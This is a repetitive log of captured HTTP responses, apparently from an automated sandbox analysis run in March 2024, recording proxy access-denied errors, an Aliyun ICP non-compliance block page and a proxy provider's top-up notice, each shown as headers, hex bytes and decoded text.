Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:15 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:15 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:15 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:16 GMTContent-Type: text/html;charset=utf-8Content-Length: 3978X-Squid-Error: ERR_CANNOT_FORWARD 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 